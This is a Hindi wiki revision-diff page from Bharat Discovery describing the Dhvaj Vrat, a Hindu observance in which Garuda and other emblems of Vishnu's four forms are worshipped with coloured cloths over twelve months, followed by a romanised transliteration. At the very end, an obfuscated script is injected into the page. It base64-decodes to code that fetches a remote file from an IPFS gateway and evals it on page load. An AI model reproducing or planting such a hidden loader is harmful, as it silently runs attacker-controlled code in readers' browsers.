Difference between revisions of "ध्वज व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[गरुड़]], तालवृक्ष<ref>जिससे ताड़ी निकाली जाती है, अमरकोश में तालांक नामक मदिरा का उल्लेख है, बलराम उसके प्रेमी माने जाते हैं</ref>, मकर (घड़ियाल) एवं हरिण क्रम से वासुदेव, संकर्षण, प्रद्युम्न एवं अनिरुद्ध के झण्डों पर होते हैं।
 
*[[गरुड़]], तालवृक्ष<ref>जिससे ताड़ी निकाली जाती है, अमरकोश में तालांक नामक मदिरा का उल्लेख है, बलराम उसके प्रेमी माने जाते हैं</ref>, मकर (घड़ियाल) एवं हरिण क्रम से वासुदेव, संकर्षण, प्रद्युम्न एवं अनिरुद्ध के झण्डों पर होते हैं।
 
*उनके वस्त्रों एवं झण्डों का रंग क्रम से पीला, नीला, श्वेत एवं लाल होता है।
 
*उनके वस्त्रों एवं झण्डों का रंग क्रम से पीला, नीला, श्वेत एवं लाल होता है।
Line 7: Line 7:
 
*समय की लम्बाई के अनुसार विभिन्न लोकों में पहुँच होती है।
 
*समय की लम्बाई के अनुसार विभिन्न लोकों में पहुँच होती है।
 
*यदि बारह वर्षों तक ऐसा किया जाये तो कर्ता को विष्णु से सायुज्य प्राप्त हो जाती है।<ref>विष्णुधर्मोत्तरपुराण (3|146|1-14) एवं हेमाद्रि (व्रत0 2, पृ0 829-831) में इसे चतुर्मूर्तिव्रत कहा गया है।</ref>
 
*यदि बारह वर्षों तक ऐसा किया जाये तो कर्ता को विष्णु से सायुज्य प्राप्त हो जाती है।<ref>विष्णुधर्मोत्तरपुराण (3|146|1-14) एवं हेमाद्रि (व्रत0 2, पृ0 829-831) में इसे चतुर्मूर्तिव्रत कहा गया है।</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:19, 15 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • garu d, talavriksh[1], makar (gh diyal) evan harin kram se vasudev, sankarshan, pradyumn evan aniruddh ke jhandoan par hote haian.
  • unake vastroan evan jhandoan ka rang kram se pila, nila, shvet evan lal hota hai.
  • chaitr, vaishakh, jyeshth evan ashadh mean pratidin kram se garun adi ki pooja unake anukool rangin vastroan evan pushpoan ki jati hai.
  • char masoan ke ant mean brahmanoan ko tadanukool rangin vastr diye jate haian.
  • is prakar 4-4 masoan ke tin kram ate haian.
  • samay ki lambaee ke anusar vibhinn lokoan mean pahuanch hoti hai.
  • yadi barah varshoan tak aisa kiya jaye to karta ko vishnu se sayujy prapt ho jati hai.[2]


tika tippani aur sandarbh

  1. jisase ta di nikali jati hai, amarakosh mean talaank namak madira ka ullekh hai, balaram usake premi mane jate haian
  2. vishnudharmottarapuran (3|146|1-14) evan hemadri (vrat0 2, pri0 829-831) mean ise chaturmoortivrat kaha gaya hai.

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>